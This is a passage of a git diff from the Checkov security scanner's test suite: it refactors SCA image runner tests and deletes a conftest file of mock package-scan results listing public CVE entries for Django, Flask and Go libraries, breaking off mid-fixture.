             '\t/path/to/Dockerfile (sha256:123456) - Licenses Statuses:\n',
-            '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n',
-            '\t│ Package name             │ Package version          │ Policy ID                │ License                  │ Status                    │\n',
-            '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n',
-            '\t│ perl                     │ 5.34.0-3ubuntu1          │ BC_LIC_1                 │ Apache-2.0-Fake          │ FAILED                    │\n',
-            '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n',
+            '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n',
+            "\t│ Package name                   │ Package version                │ Policy ID                      │ License                            │\n",
+            '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n',
+            '\t│ perl                           │ 5.34.0-3ubuntu1                │ BC_LIC_1                       │ Apache-2.0-Fake                    │\n',
+            '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n',
         ]
     )
 
diff --git a/tests/sca_image/test_runner.py b/tests/sca_image/test_runner.py
index 58571d0c493..ade8644e5db 100644
--- a/tests/sca_image/test_runner.py
+++ b/tests/sca_image/test_runner.py
@@ -13,15 +13,13 @@
 from checkov.common.bridgecrew.code_categories import CodeCategoryType
 from checkov.common.bridgecrew.severities import Severities, BcSeverities
 from checkov.common.models.enums import CheckResult
-from checkov.github_actions.runner import Runner as GHA_Runner
+from checkov.dockerfile.runner import Runner as Dockerfile_Runner
+from checkov.kubernetes.runner import Runner as Kubernetes_Runner
 from checkov.runner_filter import RunnerFilter
 from checkov.sca_image.runner import Runner
+from .conftest import DOCKERFILE_EXAMPLES_DIR, KUBERNETES_EXAMPLES_DIR
 from .mocks import mock_scan_empty, mock_scan_image
 
-WORKFLOW_EXAMPLES_DIR = Path(__file__).parent / "examples/.github/workflows"
-WORKFLOW_IMAGE_EXAMPLES_DIR = Path(__file__).parent / "examples/example/.github/workflows"
-DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile"
-
 
 def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_name, cached_scan_result):
     # given
@@ -59,8 +57,8 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na
         )
 
         # when
-        reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR),
-                                   runner_filter=RunnerFilter(run_image_referencer=True))
+        reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR),
+                                          runner_filter=RunnerFilter(run_image_referencer=True))
 
         sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 
@@ -69,9 +67,9 @@ def test_image_referencer_trigger_image_flow_calls(mock_bc_integration, image_na
     assert len(sca_image_report.passed_checks) == 1
 
 
-def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached_scan_result):
+def test_runner_honors_enforcement_rules(mock_bc_integration, image_name2, cached_scan_result):
     # given
-    image_id_encoded = quote_plus(f"image:{image_name}")
+    image_id_encoded = quote_plus(f"image:{image_name2}")
 
     response_json = {
         "violations": [
@@ -109,14 +107,14 @@ def test_runner_honors_enforcement_rules(mock_bc_integration, image_name, cached
         # this is not quite a true test, because the checks don't have severities. However, this shows that the check registry
         # passes the report type properly to RunnerFilter.should_run_check, and we have tests for that method
         runner_filter.enforcement_rule_configs = {
-            CheckType.GITHUB_ACTIONS: Severities[BcSeverities.OFF],
+            CheckType.KUBERNETES: Severities[BcSeverities.OFF],
             CheckType.SCA_IMAGE: {
                 CodeCategoryType.LICENSES: Severities[BcSeverities.OFF],
                 CodeCategoryType.VULNERABILITIES: Severities[BcSeverities.OFF]
             }
         }
 
-        reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter)
+        reports = Kubernetes_Runner().run(root_folder=str(KUBERNETES_EXAMPLES_DIR), runner_filter=runner_filter)
         sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 
         summary = sca_image_report.get_summary()
@@ -236,7 +234,7 @@ def test_run_license_policy(mock_bc_integration, image_name, cached_scan_result)
 
         # when
         runner_filter = RunnerFilter(checks=['BC_LIC_1'], run_image_referencer=True)
-        reports = GHA_Runner().run(root_folder=str(WORKFLOW_EXAMPLES_DIR), runner_filter=runner_filter)
+        reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
         sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
     # then
     assert not [c for c in sca_image_report.passed_checks + sca_image_report.failed_checks
@@ -292,8 +290,8 @@ def test_run_with_empty_scan_result(mock_bc_integration):
 
 @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"})
 @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image)
-def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cached_scan_result2):
-    image_id_encoded = quote_plus(f"image:{image_name2}")
+def test_run_with_image_cached_reports_env(mock_bc_integration, image_name, cached_scan_result2):
+    image_id_encoded = quote_plus(f"image:{image_name}")
 
     with aioresponses() as mock_response:
         mock_response.get(
@@ -303,7 +301,7 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac
         )
 
         runner_filter = RunnerFilter(run_image_referencer=True)
-        reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter)
+        reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
         sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 
     assert len(sca_image_report.passed_checks) == 0
@@ -316,9 +314,9 @@ def test_run_with_image_cached_reports_env(mock_bc_integration, image_name2, cac
 @mock.patch.dict(os.environ, {"CHECKOV_CREATE_SCA_IMAGE_REPORTS_FOR_IR": "False"})
 @mock.patch.dict(os.environ, {"CKV_IGNORE_HIDDEN_DIRECTORIES": "false"})
 @mock.patch('checkov.sca_image.runner.Runner.get_image_cached_results', mock_scan_image)
-def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name2,
+def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integration, image_name,
                                                                    cached_scan_result2):
-    image_id_encoded = quote_plus(f"image:{image_name2}")
+    image_id_encoded = quote_plus(f"image:{image_name}")
     with aioresponses() as mock_response:
         mock_response.get(
             url=URL(mock_bc_integration.api_url + f"/api/v1/vulnerabilities/scan-results/{image_id_encoded}", encoded=True),
@@ -327,7 +325,7 @@ def test_run_with_image_cached_reports_and_without_sca_reports_env(mock_bc_integ
         )
 
         runner_filter = RunnerFilter(run_image_referencer=True)
-        reports = GHA_Runner().run(root_folder=str(WORKFLOW_IMAGE_EXAMPLES_DIR), runner_filter=runner_filter)
+        reports = Dockerfile_Runner().run(root_folder=str(DOCKERFILE_EXAMPLES_DIR), runner_filter=runner_filter)
         sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
 
     assert len(sca_image_report.passed_checks) == 0
diff --git a/tests/sca_package/__init__.py b/tests/sca_package/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/sca_package/conftest.py b/tests/sca_package/conftest.py
deleted file mode 100644
index 1b25775626e..00000000000
--- a/tests/sca_package/conftest.py
+++ /dev/null
@@ -1,915 +0,0 @@
-import os
-from pathlib import Path
-from unittest import mock
-from unittest.mock import MagicMock
-
-from typing import Dict, Any, List
-from pytest_mock import MockerFixture
-
-import pytest
-
-from checkov.common.bridgecrew.bc_source import SourceType
-from checkov.common.bridgecrew.platform_integration import BcPlatformIntegration, bc_integration
-from checkov.common.output.report import Report
-from checkov.sca_package.runner import Runner
-from checkov.runner_filter import RunnerFilter
-
-EXAMPLES_DIR = Path(__file__).parent / "examples"
-
-@pytest.fixture(autouse=True)
-def mock_env_vars():
-    with mock.patch.dict(os.environ, {"CHECKOV_RUN_SCA_PACKAGE_SCAN_V2": "false"}):
-        yield
-
-
-@pytest.fixture()
-def mock_bc_integration() -> BcPlatformIntegration:
-    bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234"
-    bc_integration.setup_bridgecrew_credentials(
-        repo_id="bridgecrewio/checkov",
-        skip_fixes=True,
-        skip_download=True,
-        source=SourceType("Github", False),
-        source_version="1.0",
-        repo_branch="master",
-    )
-    return bc_integration
-
-
-@pytest.fixture()
-def scan_result2() -> Dict[str, Any]:
-    return {
-        "repository": "/tmp/results/requirements.txt",
-        "passed": True,
-        "packages": [
-            {
-                "type": "python",
-                "name": "django",
-                "version": "1.2",
-                "path": "/tmp/results/requirements.txt"
-            },
-            {
-                "type": "python",
-                "name": "flask",
-                "version": "0.6",
-                "path": "/tmp/results/requirements.txt"
-            },
-            {
-                "type": "python",
-                "name": "requests",
-                "version": "2.26.0",
-                "path": "/tmp/results/requirements.txt"
-            }
-        ],
-        "complianceIssues": None,
-        "complianceDistribution": {
-            "critical": 0,
-            "high": 0,
-            "medium": 0,
-            "low": 0,
-            "total": 0
-        },
-        "vulnerabilities": [
-            {
-                "id": "CVE-2016-6186",
-                "status": "fixed in 1.9.8, 1.8.14",
-                "cvss": 6.1,
-                "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
-                "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.",
-                "severity": "medium",
-                "packageName": "django",
-                "packageVersion": "1.2",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186",
-                "riskFactors": [
-                    "Attack complexity: low",
-                    "Attack vector: network",
-                    "Exploit exists",
-                    "Has fix",
-                    "Medium severity"
-                ],
-                "impactedVersions": [
-                    "<=1.8.13"
-                ],
-                "publishedDate": "2016-08-05T15:59:00Z",
-                "discoveredDate": "2016-08-05T15:59:00Z",
-                "fixDate": "2016-08-05T15:59:00Z"
-            },
-            {
-                "id": "CVE-2016-7401",
-                "status": "fixed in 1.9.10, 1.8.15",
-                "cvss": 7.5,
-                "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
-                "description": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.",
-                "severity": "high",
-                "packageName": "django",
-                "packageVersion": "1.2",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401",
-                "riskFactors": [
-                    "Attack complexity: low",
-                    "Attack vector: network",
-                    "Has fix",
-                    "High severity"
-                ],
-                "impactedVersions": [
-                    "<=1.8.14"
-                ],
-                "publishedDate": "2016-10-03T18:59:00Z",
-                "discoveredDate": "2016-10-03T18:59:00Z",
-                "fixDate": "2016-10-03T18:59:00Z"
-            },
-            {
-                "id": "CVE-2019-19844",
-                "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-                "cvss": 9.8,
-                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-                "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\\\\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",
-                "severity": "critical",
-                "packageName": "django",
-                "packageVersion": "1.2",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-                "riskFactors": [
-                    "Attack complexity: low",
-                    "Attack vector: network",
-                    "Critical severity",
-                    "Has fix"
-                ],
-                "impactedVersions": [
-                    "<1.11.27"
-                ],
-                "publishedDate": "2019-12-18T19:15:00Z",
-                "discoveredDate": "2019-12-18T19:15:00Z",
-                "fixDate": "2019-12-18T19:15:00Z"
-            },
-            {
-                "id": "CVE-2021-33203",
-                "status": "fixed in 3.2.4, 3.1.12, 2.2.24",
-                "cvss": 4.9,
-                "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
-                "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.",
-                "severity": "medium",
-                "packageName": "django",
-                "packageVersion": "1.2",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203",
-                "riskFactors": [
-                    "Has fix",
-                    "Medium severity",
-                    "Recent vulnerability",
-                    "Attack complexity: low",
-                    "Attack vector: network"
-                ],
-                "impactedVersions": [
-                    "<2.2.24"
-                ],
-                "publishedDate": "2021-06-08T18:15:00Z",
-                "discoveredDate": "2021-06-08T18:15:00Z",
-                "fixDate": "2021-06-08T18:15:00Z"
-            },
-            {
-                "id": "CVE-2018-1000656",
-                "status": "fixed in 0.12.3",
-                "cvss": 7.5,
-                "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.",
-                "severity": "high",
-                "packageName": "flask",
-                "packageVersion": "0.6",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656",
-                "riskFactors": [
-                    "Attack complexity: low",
-                    "Attack vector: network",
-                    "DoS",
-                    "Has fix",
-                    "High severity"
-                ],
-                "impactedVersions": [
-                    "<0.12.3"
-                ],
-                "publishedDate": "2018-08-20T19:31:00Z",
-                "discoveredDate": "2018-08-20T19:31:00Z",
-                "fixDate": "2018-08-20T19:31:00Z"
-            },
-            {
-                "id": "CVE-2019-1010083",
-                "status": "fixed in 1.0",
-                "cvss": 7.5,
-                "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.",
-                "severity": "high",
-                "packageName": "flask",
-                "packageVersion": "0.6",
-                "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083",
-                "riskFactors": [
-                    "Has fix",
-                    "High severity",
-                    "Attack complexity: low",
-                    "Attack vector: network",
-                    "DoS"
-                ],
-                "impactedVersions": [
-                    "<1.0"
-                ],
-                "publishedDate": "2019-07-17T14:15:00Z",
-                "discoveredDate": "2019-07-17T14:15:00Z",
-                "fixDate": "2019-07-17T14:15:00Z"
-            }
-        ],
-        "vulnerabilityDistribution": {
-            "critical": 1,
-            "high": 3,
-            "medium": 2,
-            "low": 0,
-            "total": 6
-        }
-    }
-
-
-@pytest.fixture(scope='package')
-def scan_result() -> List[Dict[str, Any]]:
-    return [
-        {
-            "repository": "/path/to/requirements.txt",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "python",
-                    "name": "requests",
-                    "version": "2.26.0",
-                    "path": "/path/to/requirements.txt",
-                },
-                {
-                    "type": "python",
-                    "name": "django",
-                    "version": "1.2",
-                    "path": "/path/to/requirements.txt",
-                },
-                {
-                    "type": "python",
-                    "name": "flask",
-                    "version": "0.6",
-                    "path": "/path/to/requirements.txt",
-                },
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": [
-                {
-                    "id": "CVE-2019-19844",
-                    "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-                    "cvss": 9.8,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-                    "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",
-                    "severity": "critical",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "Critical severity": {}, "Has fix": {}},
-                    "riskFactorsV2": {
-                        "Severity": "Critical",
-                        "HasFix": True,
-                        "DoS": False,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<1.11.27"],
-                    "publishedDate": "2019-12-18T20:15:00+01:00",
-                    "discoveredDate": "2019-12-18T19:15:00Z",
-                    "fixDate": "2019-12-18T20:15:00+01:00",
-                },
-                {
-                    "id": "CVE-2016-6186",
-                    "status": "fixed in 1.9.8, 1.8.14",
-                    "cvss": 6.1,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
-                    "description": "Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.",
-                    "severity": "medium",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-6186",
-                    "riskFactors": {
-                        "Attack complexity: low": {},
-                        "Attack vector: network": {},
-                        "Medium severity": {},
-                        "Has fix": {},
-                        "Exploit exists": {}},
-                    "riskFactorsV2": {
-                        "Severity": "Medium",
-                        "HasFix": True,
-                        "DoS": False,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low",
-                        "Exploit exists": True
-                    },
-                    "impactedVersions": ["<=1.8.13"],
-                    "publishedDate": "2016-08-05T17:59:00+02:00",
-                    "discoveredDate": "2016-08-05T15:59:00Z",
-                    "fixDate": "2016-08-05T17:59:00+02:00",
-                },
-                {
-                    "id": "CVE-2016-7401",
-                    "status": "fixed in 1.9.10, 1.8.15",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
-                    "description": "The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.",
-                    "severity": "high",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2016-7401",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, "Has fix": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": False,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<=1.8.14"],
-                    "publishedDate": "2016-10-03T20:59:00+02:00",
-                    "discoveredDate": "2016-10-03T18:59:00Z",
-                    "fixDate": "2016-10-03T20:59:00+02:00",
-                },
-                {
-                    "id": "CVE-2021-33203",
-                    "status": "fixed in 3.2.4, 3.1.12, 2.2.24",
-                    "cvss": 4.9,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
-                    "description": "Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.",
-                    "severity": "medium",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2021-33203",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {}, "Has fix": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": False,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<2.2.24"],
-                    "publishedDate": "2021-06-08T20:15:00+02:00",
-                    "discoveredDate": "2021-06-08T18:15:00Z",
-                    "fixDate": "2021-06-08T20:15:00+02:00",
-                },
-                {
-                    "id": "CVE-2019-1010083",
-                    "status": "fixed in 1.0",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.",
-                    "severity": "high",
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {},
-                                    "Has fix": {}, "Dos": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": True,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<1.0"],
-                    "publishedDate": "2019-07-17T16:15:00+02:00",
-                    "discoveredDate": "2019-07-17T14:15:00Z",
-                    "fixDate": "2019-07-17T16:15:00+02:00",
-                },
-                {
-                    "id": "CVE-2018-1000656",
-                    "status": "fixed in 0.12.3",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.",
-                    "severity": "high",
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {},
-                                    "Has fix": {}, "Dos": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": True,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<0.12.3"],
-                    "publishedDate": "2018-08-20T21:31:00+02:00",
-                    "discoveredDate": "2018-08-20T19:31:00Z",
-                    "fixDate": "2018-08-20T21:31:00+02:00",
-                },
-            ],
-            "vulnerabilityDistribution": {"critical": 1, "high": 3, "medium": 2, "low": 0, "total": 6},
-            "license_statuses": [
-                {
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "packageLang": "python",
-                    "license": "OSI_BDS",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "flask",
-                    "packageVersion": "0.6",
-                    "packageLang": "python",
-                    "license": "DUMMY_OTHER_LICENSE",  # not a real license. it is just for test a package with 2 licenses
-                    "status": "OPEN",
-                    "policy": "BC_LIC_1"
-                },
-                {
-                    "packageName": "requests",
-                    "packageVersion": "2.26.0",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                }
-            ],
-        },
-        {
-            "repository": "/path/to/sub/requirements.txt",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "python",
-                    "name": "requests",
-                    "version": "2.26.0",
-                    "path": "/path/to/sub/requirements.txt",
-                }
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": None,
-            "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "license_statuses": [
-                {
-                    "packageName": "requests",
-                    "packageVersion": "2.26.0",
-                    "packageLang": "python",
-                    "license": "OSI_APACHE",
-                    "status": "COMPLIANT",
-                    "policy": "BC_LIC_1"
-                }
-            ],
-        },
-        {
-            "repository": "/path/to/go.sum",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "go",
-                    "name": "github.com/miekg/dns",
-                    "version": "v1.1.41",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "golang.org/x/crypto",
-                    "version": "v0.0.1",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "github.com/dgrijalva/jwt-go",
-                    "version": "v3.2.0",
-                    "path": "/path/to/go.sum",
-                },
-                {
-                    "type": "go",
-                    "name": "github.com/prometheus/client_model",
-                    "version": "v0.0.0-20190129233127-fd36f4220a90",
-                    "path": "/path/to/go.sum",
-                }
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": [
-                {
-                    "id": "CVE-2020-29652",
-                    "status": "fixed in v0.0.2",
-                    "cvss": 7.5,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-                    "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH servers.",
-                    "severity": "high",
-                    "packageName": "golang.org/x/crypto",
-                    "packageVersion": "v0.0.1",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {},
-                                    "Has fix": {}, "Dos": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": True,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<v0.0.2"],
-                    "publishedDate": "2020-12-17T06:15:00+01:00",
-                    "discoveredDate": "2020-12-17T05:15:00Z",
-                    "fixDate": "2020-12-17T06:15:00+01:00",
-                },
-                {
-                    "id": "CVE-2020-26160",
-                    "status": "fixed in v4.0.0-preview1",
-                    "cvss": 7.7,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
-                    "description": 'jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\\"aud\\"] (which is allowed by the specification). Because the type assertion fails, \\"\\" is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.',
-                    "severity": "high",
-                    "packageName": "github.com/dgrijalva/jwt-go",
-                    "packageVersion": "v3.2.0",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-26160",
-                    "riskFactors": {"Attack complexity: low": {}, "Attack vector: network": {}, "High severity": {},
-                                    "Has fix": {}, "Dos": {}},
-                    "riskFactorsV2": {
-                        "Severity": "High",
-                        "HasFix": True,
-                        "DoS": True,
-                        "AttackVector": "network",
-                        "AttackComplexity": "low"
-                    },
-                    "impactedVersions": ["<v4.0.0-preview1"],
-                    "publishedDate": "2020-09-30T20:15:00+02:00",
-                    "discoveredDate": "2020-09-30T18:15:00Z",
-                    "fixDate": "2020-09-30T20:15:00+02:00",
-                },
-            ],
-            "vulnerabilityDistribution": {"critical": 0, "high": 2, "medium": 0, "low": 0, "total": 2},
-        },
-    ]
-
-
-@pytest.fixture(scope='package')
-def scan_result_with_comma_in_licenses() -> List[Dict[str, Any]]:
-    return [
-        {
-            "repository": "/path/to/requirements.txt",
-            "passed": True,
-            "packages": [
-                {
-                    "type": "python",
-                    "name": "requests",
-                    "version": "2.26.0",
-                    "path": "/path/to/requirements.txt",
-                },
-                {
-                    "type": "python",
-                    "name": "django",
-                    "version": "1.2",
-                    "path": "/path/to/requirements.txt",
-                },
-                {
-                    "type": "python",
-                    "name": "flask",
-                    "version": "0.6",
-                    "path": "/path/to/requirements.txt",
-                },
-            ],
-            "complianceIssues": None,
-            "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
-            "vulnerabilities": [
-                {
-                    "id": "CVE-2019-19844",
-                    "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
-                    "cvss": 9.8,
-                    "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-                    "description": "Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)",
-                    "severity": "critical",
-                    "packageName": "django",
-                    "packageVersion": "1.2",
-                    "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-19844",
-                    "riskFactors": ["Attack complexity: low", "Attack vector: network", "Critical severity", "Has fix"],
-                    "impactedVersions": ["<1.11.27"],
-                    "publishedDate": "2019-12-18T20:15:00+01:00",
-                    "discoveredDate": "2019-12-18T19:15:00Z",
-                    "fixDate": "2019-12-18T20:15:00+01:00",
-                },
-                {
